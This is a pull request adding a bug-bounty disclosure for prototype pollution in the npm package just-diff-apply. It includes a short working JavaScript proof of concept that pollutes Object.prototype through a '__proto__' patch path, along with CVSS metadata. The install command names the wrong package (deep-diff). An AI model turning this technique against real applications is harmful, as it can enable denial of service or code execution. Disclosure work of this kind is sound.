### PR TITLE
Prototype Pollution in just-diff-apply

### DIFF
--- a/bounties/npm/just-diff-apply/1/README.md
+++ b/bounties/npm/just-diff-apply/1/README.md
@@ -1,0 +1,33 @@
+# Description
+
+`just-diff-apply` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var {diffApply} = require("just-diff-apply")
+var obj = {}
+const patch = [{op: "add", path: ["__proto__","polluted"], value: "Yes! Its Polluted"}];
+console.log("Before : " + obj.polluted);
+diffApply(obj, patch);
+var obj1={}
+console.log("After : " + obj1.polluted);
+```
+
+2. Execute the following commands in another terminal:
+
+```bash
+npm i deep-diff # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```

--- a/bounties/npm/just-diff-apply/1/vulnerability.json
+++ b/bounties/npm/just-diff-apply/1/vulnerability.json
@@ -1,0 +1,55 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-10-22",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "just-diff-apply",
+        "URL": "https://www.npmjs.com/package/just-diff-apply",
+        "Downloads": "2,798"
+    },
+    "CWEs": [
+        {
+            "ID": "74",
+            "Description": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/angus-c/just",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "angus-c",
+        "Name": "just-diff",
+        "Forks": 119,
+        "Stars": 2454
+    },
+    "Permalinks": [
+        "https://github.com/angus-c/just/blob/master/packages/collection-diff-apply/index.js#L51"
+    ],
+    "References": []
+}


### PR DESCRIPTION
`just-diff-apply` is vulnerable to `Prototype Pollution`.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.